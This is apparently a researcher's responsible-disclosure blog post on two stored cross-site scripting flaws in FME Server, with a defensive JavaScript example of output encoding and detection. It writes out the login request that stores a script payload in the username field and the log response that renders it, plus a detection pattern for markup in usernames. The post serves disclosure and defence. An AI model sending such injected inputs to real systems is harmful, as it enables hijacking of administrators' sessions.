While working at Secura, David Van Gool and I recently found and reported two vulnerabilities in FME Server versions 2019.2 and 2020.0 Beta.

The vulnerabilities were:

  1. Unauthenticated Stored XSS
  2. Authenticated Stored XSS

The injection point for the Unauthenticated Stored XSS was the username field of the main login portal; the payload executed when the logs were viewed.

To test this, the following request attempts to log in a user with the malicious username.

POST /fmeserver/login/now HTTP/1.1
Host: fme.acc.redacted.nl
[...]
referer=%2Ffmeserver&username=%3Cscript%3Ealert%28%22XSS+in+Login%22%29%3C%2Fscript%3E&password=

The server accepted it with a 200.

HTTP/1.1 200 OK
[...]

If an Administrator navigates to the log page at https://fme.acc.redacted.nl/fmeserver/#/systemevents/history?page=1 and views the event above, the server returns the following.

HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
X-Powered-By: ARR/3.0
Date: Mon, 02 Mar 2020 14:23:11 GMT
Connection: close
Content-Length: 37250

{"offset":0,"limit":100,"totalCount":1396,"items":[{"dateFinished":"2020-03-02T15:22:43+01:00",
"name":"SYSTEMEVENT_LOGIN_FAILURE","header":{"systemEvent.description":"Failed login on web interface.",
"source":"system-event","time":"2020-03-02T15:22:43+01:00",
"user":"<script>alert(\"XSS in Login\")<\/script>",
"systemEvent.title":"Failed Login"},"id":7439,
"body":"Failed login by user <script>alert(\"XSS in Login\")<\/script> due to insufficient credentials."}

The exact same thing happens with the Name field when creating, deleting or modifying users.

Throughout the application they used JSON to display information, I guess to prevent exactly this, but in the log page the information was rendered as HTML without any output encoding, so the malicious payload executed.
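To make the root cause concrete, here is an added example (not FME Server code, and not from Safe Software) of a log viewer rendering a system event like the one above. The event objects are constructed to mirror the shape of the JSON response shown in the post; the second event, its id and timestamps are placeholders. The vulnerable renderer concatenates the `user` and `body` fields straight into markup, the hardened one entity-encodes every untrusted value first, and a small defender-side check flags stored events whose username carries markup metacharacters.

```javascript
// Constructed sample events, modelled on the SYSTEMEVENT_LOGIN_FAILURE
// item in the post. Ids and timestamps are placeholders.
const sampleEvents = [
  {
    id: 7439,
    name: "SYSTEMEVENT_LOGIN_FAILURE",
    header: {
      "systemEvent.description": "Failed login on web interface.",
      source: "system-event",
      time: "2020-03-02T15:22:43+01:00",
      user: '<script>alert("XSS in Login")</script>',
      "systemEvent.title": "Failed Login",
    },
    body: 'Failed login by user <script>alert("XSS in Login")</script> due to insufficient credentials.',
  },
  {
    id: 7440,
    name: "SYSTEMEVENT_LOGIN_FAILURE",
    header: {
      "systemEvent.description": "Failed login on web interface.",
      source: "system-event",
      time: "2020-03-02T15:25:10+01:00",
      user: "alice",
      "systemEvent.title": "Failed Login",
    },
    body: "Failed login by user alice due to insufficient credentials.",
  },
];

// HTML entity encoding for text placed inside an element body or a
// double-quoted attribute value. This is the output encoding the log
// page was missing.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: server-supplied strings concatenated into markup.
// Assigned to innerHTML, the <script> stored in `user` becomes live DOM.
function renderEventUnsafe(event) {
  return `<tr><td>${event.id}</td><td>${event.header.user}</td><td>${event.body}</td></tr>`;
}

// Hardened pattern: every value that originated from user input is
// entity-encoded, so the browser displays the payload as inert text.
function renderEventSafe(event) {
  return `<tr><td>${escapeHtml(event.id)}</td><td>${escapeHtml(event.header.user)}</td><td>${escapeHtml(event.body)}</td></tr>`;
}

// Defender-side check over stored events: a username containing markup
// metacharacters is worth an alert regardless of whether the viewer is
// patched, because other consumers of the log may render it too.
function findSuspiciousUsernames(events) {
  return events
    .filter((e) => /[<>"'&]/.test(e.header.user))
    .map((e) => ({ id: e.id, user: e.header.user }));
}

// True when rendered markup still contains an un-encoded script tag.
function containsLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration of the three functions on the sample data.
console.log("unsafe render has live <script>:", containsLiveScriptTag(renderEventUnsafe(sampleEvents[0])));
console.log("safe render has live <script>:", containsLiveScriptTag(renderEventSafe(sampleEvents[0])));
console.log("flagged events:", findSuspiciousUsernames(sampleEvents));
```

The same encoding must be applied for the Name field of user accounts, since it reaches the same log rendering path; encoding at render time rather than at storage time keeps the stored username intact for auditing while making it harmless wherever it is displayed.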

Reporting the vulnerability.

As part of Secura's responsible disclosure process, the vulnerability was reported to the vendor last month and was fixed in the following versions

There was a form on their website; I submitted a bug report with a redacted PDF and got an automatic email:

[screenshot: automatic acknowledgement email]

The same day I got an email confirming the vulnerability:

[screenshot: confirmation email]

Then they closed the ticket:

[screenshot: ticket closed notification]

And finally they confirmed the fix 🙂

[screenshot: fix confirmation email]

In general they were very helpful during the process.